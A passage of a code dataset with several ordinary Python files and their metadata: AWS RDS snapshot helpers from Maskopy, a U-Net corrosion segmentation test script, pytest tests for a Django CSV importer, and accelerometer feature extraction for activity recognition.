copy_db_snapshot_response = rds_client.copy_db_cluster_snapshot(\n **copy_db_cluster_snapshot_parameters)\n print(f\"Successfully copied DB snapshot: {destination_db_snapshot_identifier}\")\n return copy_db_snapshot_response['DBClusterSnapshot']\n print(f'{destination_db_snapshot_identifier} already exists. Using existing snapshot.')\n return destination_snapshot_response['DBClusterSnapshots'][0]\n except ClientError as err:\n if err.response['Error']['Code'] == 'Throttling':\n print(\"Throttling occurring.\")\n raise MaskopyThrottlingException(err)\n raise MaskopyResourceException(\"Could not copy snapshot: %s\" % err)\ndef copy_db_snapshot_instance(rds_client, source_db_snapshot_identifier,\n destination_db_snapshot_identifier, engine,snapshot_tags, kms_key=None):\n \"\"\"Function to create a copy of a rds snapshot, copying tags by default.\n Args:\n rds_client (Client): AWS RDS Client object.\n source_db_snapshot_identifier (str): The source snapshot identifier.\n destination_db_snapshot_identifier (str): The destination snapshot identifier.\n snapshot_tags (dict): A dict of tags to be added to snapshot\n kms_key (str, optional): KMS Key to encrypt snapshot.\n Returns:\n :dict`: Returns a dict of the created snapshot.\n Raises:\n MaskopyResourceException: Raised if resource cannot be accessed.\n \"\"\"\n copy_db_snapshot_parameters = {\n 'SourceDBSnapshotIdentifier': source_db_snapshot_identifier,\n 'TargetDBSnapshotIdentifier': destination_db_snapshot_identifier,\n 'Tags': snapshot_tags\n }\n if kms_key:\n copy_db_snapshot_parameters['KmsKeyId'] = kms_key\n try:\n print(\"Copying DB snapshot with the following parameters: \")\n print(json.dumps(copy_db_snapshot_parameters))\n destination_snapshot_response = check_snapshot_exists(\n rds_client,\n destination_db_snapshot_identifier,engine)\n if not destination_snapshot_response:\n copy_db_snapshot_response = rds_client.copy_db_snapshot(\n **copy_db_snapshot_parameters)\n print(f\"Successfully copied DB snapshot: {destination_db_snapshot_identifier}\")\n return copy_db_snapshot_response['DBSnapshot']\n print(f'{destination_db_snapshot_identifier} already exists. Using existing snapshot.')\n return destination_snapshot_response['DBSnapshots'][0]\n except ClientError as err:\n if err.response['Error']['Code'] == 'Throttling':\n print(\"Throttling occurring.\")\n raise MaskopyThrottlingException(err)\n raise MaskopyResourceException(\"Could not copy snapshot: %s\" % err)\ndef get_parameter_group(rds_client, rds_client_local, snapshot_identifier):\n \"\"\"Function to get the original parameter group name of snapshot\n Args:\n rds_client (Client): AWS RDS Client object with source session.\n rds_client_local (Client): AWS RDS Client object.\n snapshot_identifier (str): The snapshot identifier.\n Returns:\n str: A parameter group attached to original RDS instance of snapshot.\n Raises:\n MaskopyThrottlingException: Exception used to catch throttling from AWS.\n Used to implement a back off strategy.\n \"\"\"\n try:\n snapshot = rds_client.describe_db_snapshots(DBSnapshotIdentifier=snapshot_identifier)\n rds_instance = rds_client.describe_db_instances(\n DBInstanceIdentifier=snapshot['DBSnapshots'][0]['DBInstanceIdentifier'])\n parameter_group = (rds_instance['DBInstances'][0]\n ['DBParameterGroups'][0]\n ['DBParameterGroupName'])\n check_valid_parameter_group(rds_client_local, parameter_group)\n return parameter_group\n except ClientError as err:\n if err.response['Error']['Code'] == 'Throttling':\n print(\"Throttling occurring.\")\n raise MaskopyThrottlingException(err)\n if err.response['Error']['Code'] == 'DBInstanceNotFound':\n print(\"Original RDS not available.\")\n print(err)\n raise Exception(\"Parameter group not provided and cannot be extrapolated.\")\ndef check_valid_parameter_group(rds_client, parameter_group_name):\n \"\"\"Function to check for valid parameter group in destination environment.\n Args:\n rds_client (Client): AWS RDS Client object.\n parameter_group_name (str): The parameter group name.\n Raises:\n MaskopyResourceNotFoundException: Exception raised if resource is not found.\n MaskopyThrottlingException: Exception used to catch throttling from AWS.\n Used to implement a back off strategy.\n \"\"\"\n try:\n if not parameter_group_name:\n raise MaskopyResourceNotFoundException(\"Please enter a valid RdsParameterGroup.\")\n print(f'Validating parameter group: {parameter_group_name}')\n if not rds_client.describe_db_parameter_groups(\n DBParameterGroupName=parameter_group_name):\n raise MaskopyResourceNotFoundException(\"Please check your RdsParameterGroup.\")\n print(f'Validated parameter group: {parameter_group_name}')\n except ClientError as err:\n if err.response['Error']['Code'] == 'Throttling':\n print(\"Throttling occurring.\")\n raise MaskopyThrottlingException(err)\n print(f'There was a problem checking the parameter group: {err}')\n raise\n \ndef create_account_session(sts_client, role_arn, request_id):\n \"\"\"Function to create and assume account role.\n Args:\n sts_client (Client): AWS STS Client object.\n role_arn (str): The arn of the role to assume a session.\n request_id (str): UUID for session to uniquely identify session name.\n Returns:\n :obj:`boto3.session.Session`:\n A session of the role to be used.\n \"\"\"\n sts_response = sts_client.assume_role(\n RoleArn=role_arn,\n RoleSessionName=request_id\n )\n\n return boto3.session.Session(\n aws_access_key_id=sts_response['Credentials']['AccessKeyId'],\n aws_secret_access_key=sts_response['Credentials']['SecretAccessKey'],\n aws_session_token=sts_response['Credentials']['SessionToken']\n )\n\nclass MaskopyThrottlingException(Exception):\n \"\"\"Exception raised when AWS request returns a Throttling exception.\n \"\"\"\n\nclass MaskopyResourceNotFoundException(Exception):\n \"\"\"Exception raised when IAM role or user is not able to access the\n resource since the resource does not exist.\n \"\"\"\n\nclass MaskopyResourceException(Exception):\n \"\"\"Exception raised when IAM role or user is not able to access the\n resource.\n \"\"\"\n", "repo_name": "FINRAOS/maskopy", "sub_path": "lambda/02-UseExistingSnapshot/index.py", "file_name": "index.py", "file_ext": "py", "file_size_in_byte": 15389, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 21, "dataset": "github-code", "pt": "53", "api": [{"api_name": "boto3.client", "line_number": 8, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 10, "usage_type": "attribute"}, {"api_name": "boto3.client", "line_number": 25, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 48, "usage_type": "call"}, {"api_name": "botocore.exceptions.ClientError", "line_number": 112, "usage_type": "name"}, {"api_name": "botocore.exceptions.ClientError", "line_number": 138, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 191, "usage_type": "call"}, {"api_name": "botocore.exceptions.ClientError", "line_number": 203, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 231, "usage_type": "call"}, {"api_name": "botocore.exceptions.ClientError", "line_number": 242, "usage_type": "name"}, {"api_name": "botocore.exceptions.ClientError", "line_number": 268, "usage_type": "name"}, {"api_name": "botocore.exceptions.ClientError", "line_number": 294, "usage_type": "name"}, {"api_name": "boto3.session.Session", "line_number": 316, "usage_type": "call"}, {"api_name": "boto3.session", "line_number": 316, "usage_type": "attribute"}]} +{"seq_id": "20584354716", "text": "import numpy as np\nimport cv2\nfrom keras.preprocessing.image import img_to_array\nimport os\nfrom matplotlib import pyplot as plt\nfrom tqdm import tqdm\nfrom keras.models import load_model\n\n\nif __name__==\"__main__\":\n\n\n image_directory = '/content/rede2_unt/dataset_corrosion_pitting/test'\n mask_directory = '/content/rede2_unt/dataset_corrosion_pitting/test mascara'\n folder_test_results = '/content/rede2_unt/dataset_corrosion_pitting/test_results'\n\n image_dataset = []\n\n path1 = image_directory\n files=sorted(os.listdir(path1))\n for i in tqdm(files):\n imge=cv2.imread(path1+'/'+i,1) #mudar 0 para 1 em imagens com cor\n print(i)\n imge=np.flip(imge, axis=1)\n image_dataset.append(img_to_array(imge))\n\n mask_dataset = []\n \n path2 = mask_directory\n files=sorted(os.listdir(path2))\n for j in tqdm(files):\n imge2=cv2.imread(path2+'/'+j,0) #mudar 0 para 1 em imagens com cor\n\n imge2=np.flip(imge2, axis=1)\n\n mask_dataset.append(img_to_array(imge2))\n print(j)\n\n mask_dataset = np.array(mask_dataset)/255.\n image_dataset = np.array(image_dataset)/255.\n\n print(f\"image_dataset: {len(mask_dataset)}\")\n print(f\"mask_dataset: {len(mask_dataset)}\")\n\n # from sklearn.model_selection import train_test_split\n #IMPORTANTE test_size = 0 SIGNIFICA A PORCENTAGEM QUE FICARA COMO TESTE\n # SE test_size = 0.2, SIGNIFICA QUE 20% DAS IMAGENS SERÃO PARA TESTE E NÃO PARA TREINAMENTO\n\n # X_train, X_test, y_train, y_test = train_test_split(image_dataset, mask_dataset, test_size = 0.2, random_state = 0)\n\n pre_trained_unet_model = load_model('custom-unetweights-8000epochs_29_09.h5', compile=False)\n my_model = pre_trained_unet_model\n\n # IMPORTANTE O train_test_split LITERALMENTE ESTÁ SEPARANDO UMA % PARA TESTES\n # O QUE, NESTE CASO AQUI, NÃO É NECESSÁRIO\n X_test = image_dataset\n y_test = mask_dataset\n\n for i, name in enumerate(files, start=0):\n\n test_img = X_test[i]\n ground_truth = y_test[i]\n\n test_img_input=np.expand_dims(test_img, 0)\n prediction = (my_model.predict(test_img_input)[0,:,:,0] > 0.5).astype(np.uint8)\n\n plt.figure(figsize=(16, 8))\n plt.subplot(231)\n plt.title('Testing Image')\n plt.imshow(test_img, cmap='gray')\n plt.subplot(232)\n plt.title('Testing Label')\n plt.imshow(ground_truth[:,:,0], cmap='gray')\n plt.subplot(233)\n plt.title('Prediction on test image')\n plt.imshow(prediction, cmap='gray')\n #save the file\n if not os.path.exists(folder_test_results):\n os.makedirs(folder_test_results)\n filename = name\n plt.savefig(os.path.join(folder_test_results,filename))\n\n print(name)\n plt.show()", "repo_name": "Corrosao/rede2_unt", "sub_path": "runtest.py", "file_name": "runtest.py", "file_ext": "py", "file_size_in_byte": 2632, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.listdir", "line_number": 20, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 21, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.flip", "line_number": 24, "usage_type": "call"}, {"api_name": "keras.preprocessing.image.img_to_array", "line_number": 25, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 30, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 31, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.flip", "line_number": 34, "usage_type": "call"}, {"api_name": "keras.preprocessing.image.img_to_array", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 40, "usage_type": "call"}, {"api_name": "keras.models.load_model", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 65, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 67, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 67, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 69, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 70, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 70, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 71, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 71, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 72, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 73, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 74, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 75, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 76, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path", "line_number": 78, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 81, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 81, "usage_type": "call"}, {"api_name": "os.path", "line_number": 81, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.show", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}]} +{"seq_id": "41081476881", "text": "from unittest.mock import patch, MagicMock,Mock\nimport pytest\nfrom apps.importacaocsv.import_csv import ImportFromCsv\nfrom apps.loja.models import Produtos,Fabricante\nimport pandas as pd\n\n@pytest.fixture\ndef mock_dados():\n mock_data = {\n 'manufacturer': ['Lenovo', 'Samsung'],\n 'model': ['iPhone', 'Galaxy'],\n 'color': ['black', 'white'],\n 'carrier_plan_type': ['postpaid', 'prepaid'],\n 'quantity': [1, 2],\n 'price': [1000.0, 500.0]\n }\n return mock_data\n\n@pytest.fixture\ndef columns_csv():\n columns=['manufacturer','model','color','carrier_plan_type','quantity','price']\n return columns\n\n\n@pytest.mark.django_db\nclass TestImportFromCsv:\n def setup_method(self):\n mock_arquivo = MagicMock()\n mock_arquivo.name = 'valid.csv'\n self.mock_arquivo = ImportFromCsv(arquivo=mock_arquivo)\n\n def test_erros_retonar_lista(self):\n mock_funcao = self.mock_arquivo\n mock_funcao.validar_dados_necessario = Mock(return_value=False)\n \n resultado = self.mock_arquivo.erros()\n \n assert type(resultado) == list\n assert mock_funcao.validar_dados_necessario.called\n \n def test_erros_retornar_false(self):\n mock_funcao = self.mock_arquivo\n mock_funcao.validar_dados_necessario = Mock(return_value=True)\n \n resultado = self.mock_arquivo.erros()\n \n assert resultado == False\n assert mock_funcao.validar_dados_necessario.called\n \n @patch('pandas.read_csv')\n def test_pega_dataframe_valido_retorna_pands_dataframe(self,read_csv_mock,columns_csv):\n read_csv_mock.return_value = pd.DataFrame([['apple', 's9', 'azul', 'pos', '450', '55.0']], columns=columns_csv)\n\n mock_funcao = self.mock_arquivo\n mock_funcao.validar_arquivo_extensao = Mock(return_value=True)\n \n resultado = self.mock_arquivo.pega_dataframe()\n\n assert isinstance(resultado,pd.DataFrame)\n assert mock_funcao.validar_arquivo_extensao.called\n \n def test_pega_dataframe_estensao_invalido_retornar_msg_arquivo_invalido(self):\n mock_funcao = self.mock_arquivo\n mock_funcao.validar_arquivo_extensao = Mock(return_value=False)\n \n resultado = self.mock_arquivo.pega_dataframe()\n\n assert resultado == 'Arquivo invalido'\n assert mock_funcao.validar_arquivo_extensao.called\n \n @patch('pandas.read_csv')\n def test_pega_dataframe_estensao_valido_com_colunas_faltando_retornando_str(self,read_csv_mock):\n read_csv_mock.side_effect = ValueError()\n mock_funcao = self.mock_arquivo\n mock_funcao.validar_arquivo_extensao = Mock(return_value=True)\n \n resultado = self.mock_arquivo.pega_dataframe() \n\n assert isinstance(resultado, str)\n assert mock_funcao.validar_arquivo_extensao.called\n \n def test_validar_arquivo_extensao_valido_retornar_true(self):\n resultado = self.mock_arquivo.validar_arquivo_extensao()\n assert resultado == True\n \n def test_validar_arquivo_extensao_invalido_retornar_false(self):\n mock_arquivo = MagicMock()\n mock_arquivo.name = 'valid.txt'\n \n entrada = ImportFromCsv(mock_arquivo)\n resultado = entrada.validar_arquivo_extensao() \n \n assert resultado == False\n\n @pytest.mark.parametrize('dados',[\n ['apple', 's9', 'azul', 'pos', '450', '55.0']\n ])\n def test_validar_dados_necessario_arquivo_tipo_dataframe_valido_retornar_true_e_adicionando_dataframe(self,dados,columns_csv):\n mock_funcao = self.mock_arquivo\n mock_funcao.pega_dataframe = Mock(return_value=(pd.DataFrame([dados], columns=columns_csv)))\n \n resultado = self.mock_arquivo.validar_dados_necessario()\n\n assert resultado == True\n assert isinstance(self.mock_arquivo.dataframe,pd.DataFrame)\n assert mock_funcao.pega_dataframe.called\n\n def test_validar_dados_necessario_arquivo_invalido_retornar_false_e_adicionando_msg_error(self):\n mock_funcao = self.mock_arquivo\n mock_funcao.pega_dataframe = Mock(return_value=False)\n \n resultado = self.mock_arquivo.validar_dados_necessario()\n\n assert resultado == False\n assert len(self.mock_arquivo.error) == 1 \n assert mock_funcao.pega_dataframe.called\n\n @pytest.mark.parametrize('dados',[\n ['apple', 's9', 'azul', 'pos', 'a450', '55.0']])\n def test_validar_dados_necessario_contem_erros_retornando_false(self,dados,columns_csv):\n mock_funcao = self.mock_arquivo\n mock_funcao.pega_dataframe = Mock(return_value=pd.DataFrame([dados],columns=columns_csv))\n\n resultado = self.mock_arquivo.validar_dados_necessario()\n\n assert resultado == False\n assert len(self.mock_arquivo.error) == 2\n\n @pytest.mark.parametrize('dados',[\n ['apple', 's9', 'azul', 'pos', 'a450', '55.0']])\n def test_save_dataframe_nao_e_none_retornar_true(self,dados,columns_csv):\n dataframe = pd.DataFrame([dados],columns=columns_csv)\n mock_parametro = self.mock_arquivo\n mock_parametro.dataframe = MagicMock(return_value=dataframe)\n \n resultado = self.mock_arquivo.save()\n\n assert resultado == True\n \n def test_save_dataframe_e_none_retornar_false(self):\n resultado = self.mock_arquivo.save()\n\n assert resultado == False\n\n def test_save_fabricante_get_or_create_retorna_2_objetos_criado_e_com_a_dado_ja_criado_e_outra_com_samsung(self,mock_dados,fabricante_factory):\n fabricante = fabricante_factory.create()\n mock_parametro = self.mock_arquivo\n mock_parametro.dataframe = pd.DataFrame(data=mock_dados)\n\n self.mock_arquivo.save()\n\n assert len(Fabricante.objects.all()) == 2 \n assert Fabricante.objects.get(id=1) == fabricante\n assert Fabricante.objects.get(id=2).fabricante == 'Samsung'\n\n def test_save_produtos_filter_encontrado_retornando_so_2_banco_de_dados_e_alterando_price_e_quantidade(self,mock_dados,produto_factory):\n produto = produto_factory.create()\n\n mock_parametro = self.mock_arquivo\n mock_parametro.dataframe = pd.DataFrame(data=mock_dados)\n self.mock_arquivo.save()\n \n entrada = Produtos.objects.get(id=1)\n \n assert len(Produtos.objects.all()) == 2\n assert entrada == produto\n assert entrada.price == 1000\n assert entrada.quantity == 4\n ", "repo_name": "Duarts-D/loja-importacao_csv", "sub_path": "apps/importacaocsv/tests/test_import_csv.py", "file_name": "test_import_csv.py", "file_ext": "py", "file_size_in_byte": 6499, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pytest.fixture", "line_number": 7, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 19, "usage_type": "attribute"}, {"api_name": "unittest.mock.MagicMock", "line_number": 28, "usage_type": "call"}, {"api_name": "apps.importacaocsv.import_csv.ImportFromCsv", "line_number": 30, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 34, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 43, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 52, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 55, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 59, "usage_type": "attribute"}, {"api_name": "unittest.mock.patch", "line_number": 50, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 64, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 75, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 71, "usage_type": "call"}, {"api_name": "unittest.mock.MagicMock", "line_number": 87, "usage_type": "call"}, {"api_name": "apps.importacaocsv.import_csv.ImportFromCsv", "line_number": 90, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 100, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 100, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 105, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 95, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 95, "usage_type": "attribute"}, {"api_name": "unittest.mock.Mock", "line_number": 110, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 122, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 122, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 118, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 118, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 132, "usage_type": "call"}, {"api_name": "unittest.mock.MagicMock", "line_number": 134, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 129, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 129, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 148, "usage_type": "call"}, {"api_name": "apps.loja.models.Fabricante.objects.all", "line_number": 152, "usage_type": "call"}, {"api_name": "apps.loja.models.Fabricante.objects", "line_number": 152, "usage_type": "attribute"}, {"api_name": "apps.loja.models.Fabricante", "line_number": 152, "usage_type": "name"}, {"api_name": "apps.loja.models.Fabricante.objects.get", "line_number": 153, "usage_type": "call"}, {"api_name": "apps.loja.models.Fabricante.objects", "line_number": 153, "usage_type": "attribute"}, {"api_name": "apps.loja.models.Fabricante", "line_number": 153, "usage_type": "name"}, {"api_name": "apps.loja.models.Fabricante.objects.get", "line_number": 154, "usage_type": "call"}, {"api_name": "apps.loja.models.Fabricante.objects", "line_number": 154, "usage_type": "attribute"}, {"api_name": "apps.loja.models.Fabricante", "line_number": 154, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 160, "usage_type": "call"}, {"api_name": "apps.loja.models.Produtos.objects.get", "line_number": 163, "usage_type": "call"}, {"api_name": "apps.loja.models.Produtos.objects", "line_number": 163, "usage_type": "attribute"}, {"api_name": "apps.loja.models.Produtos", "line_number": 163, "usage_type": "name"}, {"api_name": "apps.loja.models.Produtos.objects.all", "line_number": 165, "usage_type": "call"}, {"api_name": "apps.loja.models.Produtos.objects", "line_number": 165, "usage_type": "attribute"}, {"api_name": "apps.loja.models.Produtos", "line_number": 165, "usage_type": "name"}, {"api_name": "pytest.mark", "line_number": 25, "usage_type": "attribute"}]} +{"seq_id": "43151149391", "text": "import pandas as pd\nimport numpy as np \nfrom scipy import stats\nfrom scipy.signal import find_peaks\n\ndef features_extract (df, accx, accy, accz, activity, window_size, step_size): \n # features based on accx, accy, accz\n x_list = []\n y_list = []\n z_list = []\n labels = []\n\n # overlapping windows\n for i in range(0, len(df) - window_size + 1, step_size):\n # arrays per axis\n xs = df[accx].values[i: i + window_size]\n ys = df[accy].values[i: i + window_size]\n zs = df[accz].values[i: i + window_size]\n\n # label with most occurrences in window\n input_array = np.array(df[activity][i: i + window_size], dtype=float)\n label = stats.mode(input_array)[0]\n\n x_list.append(xs)\n y_list.append(ys)\n z_list.append(zs)\n labels.append(label)\n\n # converting the lists to series\n x_series_td = pd.Series(x_list)\n y_series_td = pd.Series(y_list)\n z_series_td = pd.Series(z_list)\n\n # converting the signals from time domain to frequency domain using FFT\n fft_size = int((window_size/2)) + 1\n\n x_series_fft = x_series_td.apply(lambda x: np.abs(np.fft.fft(x))[1:fft_size])\n y_series_fft = y_series_td.apply(lambda x: np.abs(np.fft.fft(x))[1:fft_size])\n z_series_fft = z_series_td.apply(lambda x: np.abs(np.fft.fft(x))[1:fft_size])\n\n X = pd.DataFrame()\n y = np.array(labels)\n y = y.astype(int)\n\n for tp in ['td', 'fft']:\n\n for axis in ['x','y','z']:\n \n series = locals()[f'{axis}_series_{tp}']\n\n ################## simple statistics features ##################\n # mean\n X[f'{axis}_mean_{tp}'] = series.apply(lambda x: x.mean())\n # mean abs diff\n X[f'{axis}_meandiff_{tp}'] = series.apply(lambda x: np.mean(np.absolute(x - np.mean(x))))\n # min\n X[f'{axis}_min_{tp}'] = series.apply(lambda x: x.min())\n # max\n X[f'{axis}_max_{tp}'] = series.apply(lambda x: x.max()) \n # max-min diff\n X[f'{axis}_minmax_{tp}'] = X[f'{axis}_max_{tp}'] - X[f'{axis}_min_{tp}']\n # median\n X[f'{axis}_median_{tp}'] = series.apply(lambda x: np.median(x))\n # median abs diff \n X[f'{axis}_mediandiff_{tp}'] = series.apply(lambda x: np.median(np.absolute(x - np.median(x))))\n # std dev\n X[f'{axis}_std_{tp}'] = series.apply(lambda x: x.std())\n # interquartile range\n X[f'{axis}_quart_{tp}'] = series.apply(lambda x: np.percentile(x, 75) - np.percentile(x, 25))\n\n # indexes\n # index of min value in window\n if tp == 'td':\n X[f'{axis}_argmin_{tp}'] = series.apply(lambda x: np.argmin(x))\n # index of max value in window\n X[f'{axis}_argmax_{tp}'] = series.apply(lambda x: np.argmax(x))\n else:\n X[f'{axis}_argmin_{tp}'] = series.apply(lambda x: np.argmin(np.abs(np.fft.fft(x))[1:fft_size]))\n # index of max value in window\n X[f'{axis}_argmax_{tp}'] = series.apply(lambda x: np.argmax(np.abs(np.fft.fft(x))[1:fft_size]))\n \n # abs max-min index diff\n X[f'{axis}_minmaxarg_{tp}'] = abs(X[f'{axis}_argmax_{tp}'] - X[f'{axis}_argmin_{tp}'])\n \n # only for time domain\n if tp == 'td': \n # negtive values count\n X[f'{axis}_negatives_{tp}'] = series.apply(lambda x: np.sum(x < 0))\n # positive values count\n X[f'{axis}_positives_{tp}'] = series.apply(lambda x: np.sum(x > 0))\n \n # values above mean\n X[f'{axis}_meanabove_{tp}'] = series.apply(lambda x: np.sum(x > x.mean()))\n # skewness\n X[f'{axis}_skewness_{tp}'] = series.apply(lambda x: stats.skew(x))\n # kurtosis\n X[f'{axis}_kurtosis_{tp}'] = series.apply(lambda x: stats.kurtosis(x))\n\n\n ################## signal based features ##################\n # count peaks in signal\n X[f'{axis}_peaks_{tp}'] = series.apply(lambda x: len(find_peaks(x)[0]))\n # power of signal: average of the squared signal\n X[f'{axis}_power_{tp}'] = series.apply(lambda x: np.mean(x**2))\n \n # over all axis\n seriesx = locals()[f'x_series_{tp}']\n seriesy = locals()[f'y_series_{tp}']\n seriesz = locals()[f'z_series_{tp}']\n\n # signal magnitude area\n X[f'SMA_{tp}'] = seriesx.apply(lambda x: np.mean(abs(x))) + seriesy.apply(lambda x: np.mean(abs(x))) + seriesz.apply(lambda x: np.mean(abs(x)))\n\n # avg resultant\n X[f'avg_result_accl_{tp}'] = [i.mean() for i in ((seriesx**2 + seriesy**2 + seriesz**2)**0.5)]\n\n return X, y", "repo_name": "ylekka/thesisYL", "sub_path": "AR_features_extract.py", "file_name": "AR_features_extract.py", "file_ext": "py", "file_size_in_byte": 4834, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.array", "line_number": 21, "usage_type": "call"}, {"api_name": "scipy.stats.mode", "line_number": 22, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 22, "usage_type": "name"}, {"api_name": "pandas.Series", "line_number": 30, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 31, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.fft.fft", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 37, "usage_type": "attribute"}, {"api_name": "numpy.abs", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.fft.fft", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 38, "usage_type": "attribute"}, {"api_name": "numpy.abs", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.fft.fft", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 39, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.absolute", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.absolute", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.percentile", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.fft.fft", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 78, "usage_type": "attribute"}, {"api_name": "numpy.argmax", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.fft.fft", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 80, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 93, "usage_type": "call"}, {"api_name": "scipy.stats.skew", "line_number": 95, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 95, "usage_type": "name"}, {"api_name": "scipy.stats.kurtosis", "line_number": 97, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 97, "usage_type": "name"}, {"api_name": "scipy.signal.find_peaks", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 112, "usage_type": "call"}]} +{"seq_id": "36186750258", "text": "# coding: utf-8\nimport sys, 